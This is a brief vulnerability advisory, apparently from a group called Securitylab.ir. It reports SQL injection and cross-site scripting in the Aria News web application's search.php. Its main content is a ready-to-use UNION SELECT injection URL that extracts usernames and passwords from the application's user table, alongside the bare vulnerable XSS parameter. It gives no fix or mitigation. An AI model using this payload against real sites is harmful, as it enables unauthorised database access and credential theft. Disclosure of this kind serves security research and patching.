######################### Securitylab.ir ######################## # Application Info: # Name: Aria News # Web: http://www.aryalink.com ################################################################# # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir ################################################################# # Vulnerability Info: # Type: Sql Injection & xss # Risk: Medium #====================================================== # XSS: # http://www.site.com/search.php?search= # # Sql: # http://www.site.com/search.php?search=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user #====================================================== # # Securitylab Security Research Team # ###################################################################